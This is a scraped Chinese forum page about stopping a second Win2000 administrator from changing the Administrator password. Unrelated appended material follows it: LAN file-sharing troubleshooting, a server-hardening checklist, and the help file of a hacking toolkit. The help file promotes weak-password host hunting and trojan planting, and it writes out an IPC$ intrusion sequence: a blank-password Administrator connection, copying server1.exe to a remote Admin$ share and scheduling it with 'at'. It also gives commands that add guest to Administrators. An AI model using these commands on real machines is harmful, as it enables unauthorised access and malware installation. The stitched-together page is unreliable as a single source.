如何使win2000的administrator有密码不能修改?

littlechang 2004-06-16 04:45:00
我用的是win2000专业版,我设定了另一个用户aa,权限也是在administrators组,用aa登录系统后,aa用户可以修改administrator的用户权限,我想如何设定可以使aa用户不能修改administrator用户的权限,或者使不知道其原来密码,就不能更改其密码。请高手指点。
...全文
98 7 打赏 收藏 转发到动态 举报
写回复
用AI写文章
7 条回复
切换为时间正序
请发表友善的回复…
发表回复
littlechang 2004-06-22
  • 打赏
  • 举报
回复
windows也太衰了吧,到XP好象就可以了。
seawind999 2004-06-17
  • 打赏
  • 举报
回复
不可能实现你的要求!!!
jin0706 2004-06-17
  • 打赏
  • 举报
回复
无法做到!
zkxz 2004-06-17
  • 打赏
  • 举报
回复
想让别的管理员账号没法修改administrator的密码!这个windows本身是做不到的。
soundwin 2004-06-17
  • 打赏
  • 举报
回复
在“用户和组”里,选中Administrator用户的属性,里面可以设置不能更改密码的。
kanji 2004-06-16
  • 打赏
  • 举报
回复
不可能,因为administrator是2k的内置用户,可以更名,但不可以删除或改变其admin权限
  • 打赏
  • 举报
回复
这个好像不行啊,大家都是管理员,当然应该可以了
一、启用guest来宾帐户; 二、控制面板→管理工具→本地安全策略→本地策略→用户权利指派里,“从网络访问此计算机”中加入guest帐户,而“拒绝从网络访问这台计算机”中删除guest帐户; 三、我的电脑→工具→文件夹选项→查看→去掉“使用简单文件共享(推荐)”前的勾; 四、设置共享文件夹; 五、控制面板→管理工具→本地安全策略→本地策略→安全选项里,把“网络访问:本地帐户的共享和安全模式”设为“仅来宾-本地用户以来宾的身份验证”(可选,此项设置可去除访问时要求输入密码的对话框,也可视情况设为“经典-本地用户以自己的身份验证”); 六、右击“我的电脑”→“属性”→“计算机名”,该选项卡中有没有出现你的局域网工作组名称,如“work”等。然后单击“网络 ID”按钮,开始“网络标识向导”:单击“下一步”,选择“本机是商业网络的一部分,用它连接到其他工作着的计算机”;单击“下一步”,选择“公司使用没有域的网络”;单击“下一步”按钮,然后输入你的局域网的工作组名,如“work”,再次单击“下一步”按钮,最后单击“完成”按钮完成设置。 访问网上邻居时显示:" windows xp系统访问局域网时显示 "WORKGROUP无法访问.您可能没有权限使用网络资源.请与这台服务器的管理员联系以查明您是否有访问权限.此工作组的服务器的列表当前无法使用." 我用的是xp系统 我也遇到过这样的情况,当时也是着急得不轻,后来看到了以下的内容,照着一步步的做了做,真的好了。内容不少,但是仍然希望你能耐住性子,仔细的看看自己属于那种情况,应该会有所收获。 局域网互访 - [ 网络 ] 我也是类似问题。 以前一个局域网10多台机子互访问。安了蕃茄花园v2.3,感觉主题漂亮,桌面壁纸自动换,很爽。访问局域网计算机没问题。可网内其它机子在工作组内能看到我的机子,但打不开。说什么“没有权限”。所有设置都作了如下改动(网上找的),依然无效,何故?但求高手指点。 “网上邻居”无法互访问题解决方法大全 “网上邻居”无法互访的问题实在是太常见了,无论在学校,网吧还是家里多台电脑联机,都有可能遇到网上邻居无法互访的故展。“网上邻居”无法访问的故障多种多样,总结起来基本上有下面的几个: 1,没有共享资源/共享服务未启用。 症状:电脑与电脑间可以Ping通,但无法访问共享资源,在“计算机管理”中查看“本地共享”后会弹出“没有启动服务器服务”的错误对话框。 解决:在控制面板-管理工具-服务中启动Server服务。并设置“启动类型”为“自动”。 2,IP设置有误。 症状:双机之间无法互Ping,连接用的双绞线经过测试没有问题,没有安装防火墙。 解决:检查两台电脑的IP是否处在同一网段,还有子掩码是否相同。 3,WINXP默认设置不正确。 症状:从WIN98/2000/2003上无法访问另一台WINXP的机器。 解决:在“控制面板”中的“用户帐户”启用Guest帐号。然后在运行中输入secpol.msc启动“本地安全策略”。 本地策略 -> 用户权利指派,打开“从网络访问此计算机”,添加Guest帐户 本地策略 -> 安全选项,禁止"帐户:使用空白密码的本地帐户只允许进行控制台登陆"。 另外有时还会遇到另外一种情况:访问XP的时候,登录对话框中的用户名是灰的,始终是Guest用户,不能输入别的用户帐号。 解决:本地策略 -> 安全选项 -> "网络访问:本地帐户的共享和安全模式",修改为"经典-本地用户以自己的身份验证" 4,系统漏洞修补软件修改了安全策略。 症状:在“网上邻居”中可以看到对方的计算机,但是访问共享时却提示“没有权限访问网络” 解决:在开始菜单运行中输入secpol.msc启动“本地安全策略”,本地策略 -> 用户权利分配,打开“拒绝从网络访问这台计算机”,删除guest用户。 5,防火墙规则。 症状:安装了防火墙(包括WINXP系统自带的防火墙),出现无法Ping通,或者是访问共享资源的时候提示"XXX无法访问"、"您可能没有权限使用网络资源"、"请与这台服务器的管理员联系以查明您是否有访问权限"、"找不到网络路径"等类似的提示。 解决:停止防火墙或者添加局域网的访问规则。 WINXP自带的防火墙:打开控制面板 -> 网络和Internet连接 -> Windows防火墙 -> 例外,勾选“文件和打印机共享”。 6,Win2000/XP与Win98互访 症状:Ping命令可以通过,但无法在“网上邻居”中实现互访。 解决:在WIN2000/XP系统中:控制面板 -> 管理工具 -> 计算机管理 -> 本地用户和组 -> 用户,在Guest帐户上点击鼠标右键,选择属性,在常规项里取消
服务器安全的管理全文共3页,当前为第1页。网络安全界有句名言:最少的服务加最小的权限等于最大的安全。 公司服务器配置情况如下: 67、68、69、70的服务器安装的系统是WIN2000 Advance Server版本,采用了IIS5.0作为虚拟主机系统,为保证系统的安全和数据的可靠,特将硬盘划分为系统盘与数据盘,WIN2000安装于系统盘上,数据库系统安装在数据盘上. 服务器上采取的安全防护措施如下: 1. 所有的分区都格式化成NTFS格式,保证对用户权限的控制.给予administrators 和system完全控制的权限,将系统默认的everyone的完全控制权限删除,根据不同用户再分别授予相应的权限。 2. 将硬盘空间分成系统分区(安装操作系统),网站分区(运行虚拟主机和客户网站,后台数据库的分区),备份分区(做数据与程序的备份存储用)。 3. 开启了事件审核功能,对用户登录,策略改动以及程序运行情况进行实时监控,保证在系统被破坏的情况下也能有案可查。 4. 对于后台数据库中的用户数据,在SQLSERVER中进行了设置,每天晚上会自动执行一次所有后台数据库数据的备份工作,即使当天客户的数据库被误删除了,也能找到前天晚上备份的所有数据,保证客户数据的安全可靠。 5. 对于前台网站,我们采用系统自带的备份功能,设置了每周的备份计划,将客户的网站在每周日进行一次完全备份.保证了客户网站的数据完整。 6. 在IIS安装时只安装了WEB服务,其余的FTP、SMTP、NNTP均未安装。 7. FTP服务器采用了Ser-U服务器程序,运行稳定且可靠,并升级到了最新的版本,禁止匿名用户的登陆,给每个用户分配了一个强健的密码,并设定了只能访问其自身的目录。 8. 操作系统安装好以后,及时打好了SP4和系统安全补丁,防止了病毒感染和黑客攻击的可能性,保证了系统的正常安全运行.在微软的漏洞被发现以后,及时升级系统,打好系统补丁。 9. 同时安装了微软自带的终端服务和SYMANTEC公司的pcanywhere远程控制软件,即使一个远程控制服务没能开启,也可以保证采用另一个远程登陆方式能连接上服务器。 10. 防病毒软件采用了SYMANTEC公司的norton防病毒软件,并每周按时升级后杀毒,保证了系统的无毒和安全。 11. 禁用了来宾用户帐号,对系统管理员帐号进行了重命名,最大限度地减少了系统被攻击的可能性。 12. 对系统的用户的密码进行了控制,管理员的密码采用了字母与数字以及特殊字符相结合的办法,防范暴力破解密码的可能性,保证服务器的安全。 13. 对于测试法破解密码的方法,采取了五次密码输错即锁定用户30分钟的做法,防止测试法试探密码。 14. 采用了网络漏洞扫描工具定期对服务器进行网络安全的检查和测试,发现安全漏洞后及时修补,防止安全问题的产生。 15. SQL Server 2000数据库安装以后即升级到SP3的版本,减少数据库漏洞的产生,防止了蠕虫病毒的感染和黑客的破坏。 16. 数据库中的SA超级用户采用了个强健的密码,并对每个用户使用的数据库制定了一个用户名和密码,并设定了相应的权限。每个用户只能对本数据库进行操作,有效地防止了跨库操作的发生.危及数据库安全。 杭州网通互联公司 网管 刘蔚 2004年7月14日 Win2000服务器网络安全设置 一、帐户安全管理 1.帐户要尽可能少,并且经常用一些扫描工具检查系统帐户,帐号权限及密码,删除已经不再使用的帐户 2.停用Guest帐号,并给Guest加一个复杂的密码。 3.把系统 Administrator帐号改名,尽量把它伪装成普通用户,名称不要带有Admin字样。 4.不让系统显示上次登陆的用户名。 修改Win2000的本地安全策略 设置"本地安全策略-本地策略-选项"中的"登录屏幕上不要显示上次登陆的用户名" 二、网络服务安全管理 1.关闭不必要的服务 一些服务可能会给系统带来安全漏洞,如WIN2000的Terminal Services(终端服务),IIS和RAS(远程访问服务)等。 除非确有必要,关闭Task Scheduler,Telnet,Remote Registry Service,RunAs Service,Print Spooler等不必要的服务。 2.关闭不必要的端口 当服务器只提供较单一的功能时,可考虑只开放某些端口。 具体方法为:按顺序打开"网上邻居-属性-本地连接-属性-INTERNET协议(TCP/IP)属性-高级-选项-TCP/IP筛选-属性",打开TCP/IP筛选,添加需要的TCP,UDP协议即可。 3.禁止建立空连接 默认情 下,任何用户可通过空连接连上服务器,枚举帐号并猜测帐号。 修改WIN2000的本地安全策略 设置"本地安全策略-本地策略
::: 啊D网络工具包 帮助文件 ::: 软件功能如下: --------------------------------------------------------------------------------- 1. 共享资源查找 [为你查找网上的共享资源!] 2. 肉鸡查找 [查找一个网段NT,Win2000密码过于简单的主机,还加入了系统版本识别,使用更方便] 3. 远程服务查看 [你可以查看和修改远程的服务,如关闭和启动Telnet,更方便!] 4. 查看隐藏共享 [查看远程计算机的全部共享,包括隐藏的共享也可以查看的到,查看共享更方便] 5. 查看用户组信息 [Win介面的查看远程机子的用户和组的信息,便用更方便!] 6. 开远程的Telnet [直截开启微软自带的Telnet,开Telnet,原来也可以这么简单!] 3. NT消息发送 [向NT的机子发送消息,便用Win介面使用更方便!] 3. IP端口扫描 [有针对性的查看整个网段的某个端口,如冰河端口7626] 4. 端口扫描 [使你更加了解对方主机端口的打开状况] 5. 网卡MAC [快速获取一个网段的 用户名、工作组、对方的网卡MAC地址] 6. 网络状态查看 [想知道自己机子打开了什么端口吗?本程序可帮上你的忙!] 7. 主机查询 [想知道IP的的所在地?想知道某地有哪些IP,本程序可帮上你的忙!] 8. Ping [判断某IP是否和网络连接的好帮手!] 9. 域名<=>IP [想知道域名对应的IP,想知道IP对应的域名,本程序可以帮助你!] 10. 路由查看 [想知道某IP经过的路由?用本程序就可以给你答案!] 11. Finger [Finger能为你查询对方系统的用户信息!] 12. 进程查看 [查看正在运行的软件,查木马还是有一定的帮助的!] 13. 本机IP [在上网的时候,想知道自己的IP吗?本程序可以为你办到!] 14. 常用修改 [反恶意网页修改,恢复系统设置等] 19. 查错误代号说明 [不知道51这个代号表示什么错误,查一查就知道了!] --------------------------------------------------------------------------------- 支持的系统:win98/WinMe/win2000/WinXP/WinNT 功能键说明: Ctrl+'1' ~ '9' 显示指定数字的页面 CtrL+'-' 前一页 CtrL+'+' 后一页 * 在IP1输入框里双击鼠标左键转到"主机查询" * 在IP2输入框里双击鼠标左键将把IP2输入框的IP转为IP1输入框的IP! * 在程序里,大部分地方都有右键功能! =================================== 文件组成 =================================== DTools.exe 主要的执行文件 Help.txt 帮助文件 Setup.ini 设置文件 IP.^_^ IP数据文件 *.d99 共享资源文件 *.Por 指定扫描的端口文件 =================================== 关于 =================================== 制作人: 啊D QQ号码: 9269563 邮 箱: paf@163.net 网 址: http://d99.126.com 地 址: 深圳市龙岗区坪山镇石井太阳村 如果觉得本软件不错,请发一份电子信件, 表示对作者的支持! 在使用中发现错误,请记下你的测试环境,告诉我!以便更好地解决问题,先谢! 注: 本软件为免费软件,对使用本软件产生的后果,由使用者承担! 本软件可随意转载,转载时请确保文件的完整!未经同意,请勿用于商业用途! ================================================================== 一些常用的DOS网络命令 ================================================================== net share abc$=c:\ 将c:盘映射为 abc$ (加了“$”之后为隐藏的共享目录) net share c$ /del 禁止C$共享 net use z: \\*.*.*.*\C$ 把 *.*.*.*(IP) 的共享 C$ 映射为本地的 Z:盘 net use c: /del 删除映射的c盘 net use * /del /y 删除全部 net start 显示本地主机当前服务 net start telnet 启动 Telnet 服务 net start Server 启动 Server 服务 (IPC$ 和共享要靠这个服务) net stop Messenger 停止信使服务(不会在有烦人的Win的弹出广告了)! net stop server 停止Server 服务 (关了这服务,远程的机子就不能查看你的共享和用IPC$入侵) net user 得到本地主机的用户列表 net user guest /active:yes 将停用的guest帐号激活(变为可用) net user guest 888888 把 Guest 帐号的密码改为 888888 net localgroup Administrators guest /add 把 Guest 加到Administrators组中(这样你就有了超级权限了) net view \\*.*.*.* 查看指定IP主机上的共享 nbtstat -A *.*.*.* 得到远程主机的NetBIOS用户名列表 net share 查看本地主机的共享资源(本地的默认共享也可以看到) net use \\*.*.*.*\ipc$ "" /user:"" 建立空连接 telnet *.*.*.* 90 连接对方机子的telnet,端口为90 ipconfig 查看本机的IP信息 入侵ipc过程序命令 ----------------------------------------------- net use \\*.*.*.*\ipc$ "" /user:"Administrator" 建立用户名为 Administrator 密码为空的连接 copy server1.exe \\*.*.*.*\Admin$\system32 即将当前目录下的Server1.exe复制到对方Admin$共享的System32目录内 net time \\*.*.*.* 查看远程主机的当前时间 at \\*.*.*.* 14:00 server1.exe 在对方机子添加一个在 14:00 运行 server1.exe 的任务 netstat [-r] [-s] [-n] [-a] 参数含义: -r 显示本机路由表的内容; -s 显示每个协议的使用状态(包括TCP协议、UDP协议、IP协议); -n 以数字表格形式显示地址和端口; -a 显示所有主机的端口号。 ------------------------------------------------------------------ ================================================================= 更新 ================================================================= DTools 2.01 更新情况(2004.4.3) * 更新了过期问题。 * 加入公告板。 DTools 2.0 更新情况(2003.8.15) * 强加了远程查看和修改服务功能。 * 强加了查看隐藏共享。 * 强加了查看用户和组信息。 * 强加了NT消息发送。 * 强加了远程开Telnet的功能。 * 强加了查错误代号说明。 * 价面作了修改。 * 修正了在IP1里不能用快捷建 "Ctrl+C" "Ctrl+V" 等问题! 使复制和粘贴更方便! * 软件介面大小可以自由调整!使用更方便! * "肉鸡查找"增加了识别对方系统版本功能!使"肉对查找"有更体贴的感受! * "木马种植"可以只在对方系统添加命令,而不复制文件!就像远程Telnet这么好用! * 修正了"主机查询"的读取某些追捕数据文件会出错的问题! * "网络状态"的右键菜单加入了"查看所有端口所明",想知道你的机子打开端口的说明,一按就全知道! * "路由查看"增加了"显示域名"和"显示对方IP所在地"的功能,了解路由机子的信息更方便! * "共享资源查找"增加了"自动保存"! * 在主机框里输入IP将会在全部的IP框中加入刚输入的地址!在IP框中输入IP也会把IP加入主机框中!减少了复制、粘贴的工作量! DTools 1.01 更新情况(2003.4.20) * 增加了网卡MAC地址查看功能! * 增加了肉鸡(IPC$)查找功能! * 增加了木马(IPC$)种植! * 增加了读取NT用户列表功能! * 增加了Finger功能! * 增强了共享资源查找器的功能,在win2000下能查找 C$ D$ .. IPC$ ADMIN$ 等隐藏共享目录 * 修改了共享查找的介面 * 删除了密码查看功能 * 修正了在Win2000不能运行的问题 * 修正了一些Bug * 介面作了少量改动! * 添加了"在桌面加入快捷方式"的功能! * 外置了端口说明!

6,847

社区成员

发帖
与我相关
我的任务
社区描述
Windows 2016/2012/2008/2003/2000/NT
社区管理员
  • Windows Server社区
  • qishine
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧